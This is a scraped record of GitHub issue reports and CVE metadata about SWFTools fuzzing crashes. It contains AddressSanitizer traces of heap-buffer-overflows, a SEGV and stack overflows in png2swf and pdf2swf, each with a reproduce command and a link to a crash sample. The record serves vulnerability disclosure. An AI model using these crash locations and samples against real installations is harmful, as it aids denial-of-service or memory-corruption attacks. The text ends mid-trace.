/home/bupt/Desktop/swftools/src/png2swf.c:802:5 #7 0x7fc97197cc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/src/png2swf.c:184:10 in png_read_header Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c047fff8000: fa fa 00[04]fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==109951==ABORTING ``` ### reproduce command to reproduce the crash : ./png2swf -j 50 [sample file] -o /dev/null ### sample file [id5_heap-buffer-overflow.zip](https://github.com/matthiaskramm/swftools/files/9034382/id5_heap-buffer-overflow.zip) ### crash info ``` ==7560==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6190000004a1 at pc 0x000000552b5b bp 0x7ffc4a0c7730 sp 0x7ffc4a0c7728 READ of size 1 at 0x6190000004a1 thread T0 #0 0x552b5a in png_load /home/bupt/Desktop/swftools/lib/png.c:813:15 #1 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6 #2 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10 #3 0x7fbc1782dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #4 0x41ce29 in _start (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29) 0x6190000004a1 is located 0 bytes to the right of 1057-byte region [0x619000000080,0x6190000004a1) allocated by thread T0 here: #0 0x4af3f0 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x54bf0e in png_load /home/bupt/Desktop/swftools/lib/png.c:517:33 #2 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6 #3 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10 #4 0x7fbc1782dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/png.c:813:15 in png_load Shadow bytes around the buggy address: 0x0c327fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff8090: 00 00 00 00[01]fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==7560==ABORTING ``` ### reproduce command to reproduce the crash : ./png2swf -j 50 [sample file] -o /dev/null ### sample file [id8_heap_buffer_overflow.zip](https://github.com/matthiaskramm/swftools/files/9034383/id8_heap_buffer_overflow.zip) ### crash info ``` ==16841==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000001b4 at pc 0x000000552ceb bp 0x7fff18453570 sp 0x7fff18453568 READ of size 4 at 0x6020000001b4 thread T0 #0 0x552cea in png_load /home/bupt/Desktop/swftools/lib/png.c:832:43 #1 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6 #2 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10 #3 0x7f90177d9c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #4 0x41ce29 in _start (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29) 0x6020000001b4 is located 0 bytes to the right of 4-byte region [0x6020000001b0,0x6020000001b4) allocated by thread T0 here: #0 0x4af3f0 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x55014c in png_load /home/bupt/Desktop/swftools/lib/png.c:768:19 #2 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6 #3 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10 #4 0x7f90177d9c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/png.c:832:43 in png_load Shadow bytes around the buggy address: 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa fd fd fa fa fd fa fa fa fd fd fa fa 00 05 0x0c047fff8010: fa fa fd fd fa fa fd fa fa fa fd fd fa fa 00 05 0x0c047fff8020: fa fa fd fd fa fa 03 fa fa fa fd fd fa fa fd fd =>0x0c047fff8030: fa fa 00 05 fa fa[04]fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==16841==ABORTING ``` ### reproduce command to reproduce the crash : ./png2swf -j 50 [sample file] -o /dev/null ### sample file [id13_heap-buffer-overflow.zip](https://github.com/matthiaskramm/swftools/files/9034384/id13_heap-buffer-overflow.zip) ### crash info ``` ==39505==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x617000000378 at pc 0x000000552c2e bp 0x7fff87bf0950 sp 0x7fff87bf0948 READ of size 4 at 0x617000000378 thread T0 #0 0x552c2d in png_load /home/bupt/Desktop/swftools/lib/png.c:832:43 #1 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6 #2 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10 #3 0x7f3352dcec86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #4 0x41ce29 in _start (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29) 0x617000000378 is located 68 bytes to the right of 692-byte region [0x617000000080,0x617000000334) allocated by thread T0 here: #0 0x4af3f0 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x55014c in png_load /home/bupt/Desktop/swftools/lib/png.c:768:19 #2 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6 #3 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10 #4 0x7f3352dcec86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/png.c:832:43 in png_load Shadow bytes around the buggy address: 0x0c2e7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2e7fff8060: 00 00 00 00 00 00 04 fa fa fa fa fa fa fa fa[fa] 0x0c2e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==39505==ABORTING ``` ### reproduce command to reproduce the crash : ./png2swf -j 50 [sample file] -o /dev/null ### sample file [id16_heap-buffer-overflow.zip](https://github.com/matthiaskramm/swftools/files/9034798/id16_heap-buffer-overflow.zip) ### crash info ``` ==29029==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000001b8 at pc 0x000000552ceb bp 0x7ffc959816f0 sp 0x7ffc959816e8 READ of size 4 at 0x6020000001b8 thread T0 ==29029==WARNING: failed to fork (errno 12) ==29029==WARNING: failed to fork (errno 12) ==29029==WARNING: failed to fork (errno 12) ==29029==WARNING: failed to fork (errno 12) ==29029==WARNING: failed to fork (errno 12) ==29029==WARNING: Failed to use and restart external symbolizer! #0 0x552cea (/home/bupt/Desktop/swftools/build/bin/png2swf+0x552cea) #1 0x4fac8f (/home/bupt/Desktop/swftools/build/bin/png2swf+0x4fac8f) #2 0x4fd5f5 (/home/bupt/Desktop/swftools/build/bin/png2swf+0x4fd5f5) #3 0x7f324745ac86 (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #4 0x41ce29 (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29) 0x6020000001b8 is located 4 bytes to the right of 4-byte region [0x6020000001b0,0x6020000001b4) allocated by thread T0 here: #0 0x4af3f0 (/home/bupt/Desktop/swftools/build/bin/png2swf+0x4af3f0) #1 0x55014c (/home/bupt/Desktop/swftools/build/bin/png2swf+0x55014c) #2 0x4fac8f (/home/bupt/Desktop/swftools/build/bin/png2swf+0x4fac8f) #3 0x4fd5f5 (/home/bupt/Desktop/swftools/build/bin/png2swf+0x4fd5f5) #4 0x7f324745ac86 (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/bupt/Desktop/swftools/build/bin/png2swf+0x552cea) Shadow bytes around the buggy address: 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd 0x0c047fff8010: fa fa fd fd fa fa fd fa fa fa fd fd fa fa fd fd 0x0c047fff8020: fa fa fd fd fa fa 03 fa fa fa fd fd fa fa fd fd =>0x0c047fff8030: fa fa fd fd fa fa 04[fa]fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ``` ---------------------- ## SEGV ### reproduce command to reproduce the crash : ./png2swf -j 50 [sample file] -o /dev/null ### sample file [id12_SEGV.zip](https://github.com/matthiaskramm/swftools/files/9034385/id12_SEGV.zip) ### crash info ``` AddressSanitizer:DEADLYSIGNAL ==30779==ERROR: AddressSanitizer: SEGV on unknown address 0x7f62129fc800 (pc 0x000000550c36 bp 0x7ffc5ce7ea10 sp 0x7ffc5ce7e780 T0) ==30779==The signal is caused by a READ memory access. #0 0x550c36 in png_load /home/bupt/Desktop/swftools/lib/png.c:801:17 #1 0x4fac8f in MovieAddFrame /home/bupt/Desktop/swftools/src/png2swf.c:476:6 #2 0x4fd5f5 in main /home/bupt/Desktop/swftools/src/png2swf.c:822:10 #3 0x7f6316332c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #4 0x41ce29 in _start (/home/bupt/Desktop/swftools/build/bin/png2swf+0x41ce29) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/png.c:801:17 in png_load ==30779==ABORTING ```
bug found in swftools-png2swf
https://api.github.com/repos/swftools/swftools/issues/183/comments
0
2022-07-03T08:51:23Z
2022-07-04T03:22:44Z
https://github.com/swftools/swftools/issues/183
1,292,247,150
183
CVE-2022-35107
2022-08-16T21:15:11.180
SWFTools commit 772e55a2 was discovered to contain a stack overflow via vfprintf at /stdio-common/vfprintf.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/184" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:-:*:*:*:*:*:*:*", "matchCriteriaId": "05E27E60-6223-457B-BF90-E747C9C5DEE1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/184
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
# heap buffer overflow ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id458_heap_overflow_draw_stroke.zip](https://github.com/matthiaskramm/swftools/files/9036118/id458_heap_overflow_draw_stroke.zip) ### crash info ``` ==11942==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x607000000690 at pc 0x00000092ce96 bp 0x7fff21d34940 sp 0x7fff21d34938 WRITE of size 8 at 0x607000000690 thread T0 #0 0x92ce95 in draw_stroke /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:207:17 #1 0x92e224 in gfxpoly_from_stroke /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:226:5 #2 0x90989c in polyops_stroke /home/bupt/Desktop/swftools/lib/devices/polyops.c:229:23 #3 0x7c1563 in VectorGraphicOutputDev::strokeGfxline(GfxState*, _gfxline*, int) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:612:9 #4 0x7cd69e in VectorGraphicOutputDev::stroke(GfxState*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1487:5 #5 0x6eeffa in Gfx::opStroke(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:1415:12 #6 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #7 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #8 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #9 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #10 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #11 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #12 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #13 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #14 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #15 0x7f395ddd6c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #16 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) 0x607000000690 is located 0 bytes to the right of 80-byte region [0x607000000640,0x607000000690) allocated by thread T0 here: #0 0x4b3160 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x92c94f in draw_stroke /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:192:26 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:207:17 in draw_stroke Shadow bytes around the buggy address: 0x0c0e7fff8080: fa fa fd fd fd fd fd fd fd fd fd fd fa fa fa fa 0x0c0e7fff8090: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fd fd 0x0c0e7fff80a0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd 0x0c0e7fff80b0: fd fd fd fd fd fd fa fa fa fa fd fd fd fd fd fd 0x0c0e7fff80c0: fd fd fd fa fa fa fa fa 00 00 00 00 00 00 00 00 =>0x0c0e7fff80d0: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff8100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff8110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0e7fff8120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==11942==ABORTING ``` ----------------------------------- # Stack buffer overflow ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id407_stack_overflow_getcurrentthread.zip](https://github.com/matthiaskramm/swftools/files/9036121/id407_stack_overflow_getcurrentthread.zip) ### crash info ``` ==4742==ERROR: AddressSanitizer: stack-overflow on address 0x7ffff930cff8 (pc 0x0000004e43a9 bp 0x000000eeb720 sp 0x7ffff930cfd0 T0) #0 0x4e43a9 in __sanitizer::StackDepotNode::hash(__sanitizer::StackTrace const&) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/sanitizer_common/sanitizer_stackdepot.cpp:54 #1 0x4e43a9 in __sanitizer::StackDepotBase<__sanitizer::StackDepotNode, 1, 20>::Put(__sanitizer::StackTrace, bool*) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/sanitizer_common/sanitizer_stackdepotbase.h:104 #2 0x4e43a9 in __sanitizer::StackDepotPut(__sanitizer::StackTrace) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/sanitizer_common/sanitizer_stackdepot.cpp:98 #3 0x428654 in __asan::Allocator::Allocate(unsigned long, unsigned long, __sanitizer::BufferedStackTrace*, __asan::AllocType, bool) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_allocator.cpp:573 #4 0x4295e6 in __asan::asan_malloc(unsigned long, __sanitizer::BufferedStackTrace*) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_allocator.cpp:980 #5 0x4b3133 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:146 #6 0x607dd8 in gmalloc(int, bool) /home/bupt/Desktop/swftools/lib/pdf/xpdf/gmem.cc:101:13 #7 0x607dd8 in gmalloc /home/bupt/Desktop/swftools/lib/pdf/xpdf/gmem.cc:116:12 #8 0x607dd8 in copyString /home/bupt/Desktop/swftools/lib/pdf/xpdf/gmem.cc:301:16 #9 0x664133 in Object::initCmd(char*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:103:30 #10 0x664133 in Lexer::getObj(Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Lexer.cc:357:10 #11 0x65d52b in Parser::shift() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:226:12 #12 0x65d52b in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:108:5 #13 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #14 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #15 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #16 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #17 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #18 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #19 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #20 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #21 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #22 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #23 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #24 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #25 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #26 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #27 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #28 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #29 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #30 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #31 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #32 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #33 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #34 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #35 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 //...omission #286 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #287 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #288 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #289 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #290 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 SUMMARY: AddressSanitizer: stack-overflow /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/sanitizer_common/sanitizer_stackdepot.cpp:54 in __sanitizer::StackDepotNode::hash(__sanitizer::StackTrace const&) ==4742==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id465_stack_overflow_buffered_vfprintf.zip](https://github.com/matthiaskramm/swftools/files/9036128/id465_stack_overflow_buffered_vfprintf.zip) ### crash info ``` ==27980==ERROR: AddressSanitizer: stack-overflow on address 0x7ffe5cfafef8 (pc 0x7f211a7bd396 bp 0x7ffe5cfb03b0 sp 0x7ffe5cfafe40 T0) #0 0x7f211a7bd396 in vfprintf /build/glibc-CVJwZb/glibc-2.27/stdio-common/vfprintf.c:1275 #1 0x7f211a7c063f in buffered_vfprintf /build/glibc-CVJwZb/glibc-2.27/stdio-common/vfprintf.c:2329 #2 0x7f211a7bd6f5 in vfprintf /build/glibc-CVJwZb/glibc-2.27/stdio-common/vfprintf.c:1301 #3 0x451e56 in vfprintf /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1647 #4 0x451f66 in fprintf 